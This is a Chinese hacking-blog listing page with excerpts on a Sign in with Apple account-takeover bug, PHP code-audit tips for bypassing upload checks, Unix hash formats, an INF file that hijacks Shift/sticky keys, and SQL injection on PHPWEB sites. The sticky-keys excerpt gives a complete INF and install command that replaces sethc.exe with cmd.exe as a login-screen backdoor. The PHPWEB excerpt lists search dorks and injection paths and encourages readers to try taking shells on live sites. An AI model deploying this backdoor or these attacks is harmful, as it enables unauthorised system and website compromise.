记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

sign in with apple 0 day漏洞分析

Sign in with Apple是2019年APPLE公司引入的一个新功能,允许用户在不泄露其真实邮箱地址(Apple ID)的情况下通过第三方app登入账户。研究人员Bhavuk Jain4月份在Sign in with Apple中发现了一个影响第三方应用的0 day漏洞。攻击者利用该漏洞可以完全接管用户账户无论受害者是否有有效的APPLE ID。苹果公司通过漏洞奖励计划向Bhavuk Jain发放了10万美元的奖励。 技术细节 Sign in with Apple 的工作原理与OAuth 2.0类似。通过Sign in with Apple有两种方式来认证用户,一是使用 JWT (JSON Web Token) ,一是使用APPLE服务器生成的code。该code可以用
发布时间:2020-06-01 17:09 | 阅读:11381 | 评论:0 | 标签:漏洞 0 day漏洞 Airbnb code DropBox Giphy JWT Sign in with Apple

php代码审计基础

1.session本地浏览器中的变量,是可控的.PHP中还有一个变量$_session每个访问者的sessionID是不同的.这个值就用来区分每个用户.PHPSESSID=cmebf7jkflu5a31vf67kbiopk42.$_files 上传变量包含了:js验证,扩展名验证,MIME验证,目录验证js验证简单,不加载就可以了。扩展名验证, 如php,php3MIME验证, text/phpdemo: if (($_FILES['upfile']['type'] == 'image/gif') || ($_FILES['upfile']['type'] == 'image/jpeg')目录验证,利用iis6的特殊解析,这里主讲php,就不细说了。3数字型注射直接使用intval($_GET[id]),强制转
发布时间:2016-11-18 04:20 | 阅读:145423 | 评论:0 | 标签:Code MySQL PHP

几种常见的hash加密

—————*nix系————————系统:ES(Unix)例子: IvS7aeT4NzQPM说明:Linux或者其他linux内核系统中长度: 13 个字符描述:第1、2位为salt,例子中的’Iv’位salt,后面的为hash值 系统:MD5(Unix)例子:$1$12345678$XM4P3PrKBgKNnTaqG9P0T/说明:Linux或者其他linux内核系统中长度:34个字符描述:开始的$1$位为加密标志,后面8位12345678为加密使用的salt,后面的为hash加密算法:2000次循环调用MD5加密 系统:SHA-512(Unix)例子:$6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm说明:Linux或者其他linux内核系统中长度: 13 个
发布时间:2013-06-23 20:05 | 阅读:91465 | 评论:0 | 标签:Code 加密

inf文件劫持shift

Code:[Version]Signature=”$WINDOWS NT$”[DefaultInstall]AddReg=My_AddReg_Name[My_AddReg_Name]HKLM,SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution optionssethc.exe,debugger,0×00000000,c:windowssystem32cmd.exeCommand:rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:windowstempname.inf  
发布时间:2013-01-09 00:10 | 阅读:74849 | 评论:0 | 标签:3389 Code

PHPWEB注射拿shell

今天橘子大牛发了个phpweb的exp。已经是xday了。感觉拿shell还是比较给力的!网站后台:admin.php关键查找url:maq/classdown/htmlpage/newspage/guide注射点:baidu or Google : down/class/index.php?myord=1webmall/query.php?catid=webmall/query.php?typeid=webmall/queru.php?typeid=直接放萝卜去:网上已经有各种注入exp了。search.php构造注射,伪静态注射。不妨去试试!上传html脚本:<form name=”uploadForm” method=”post” enctype=”multipart/form-data” acti
发布时间:2013-01-08 01:10 | 阅读:387392 | 评论:0 | 标签:Code PHP

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云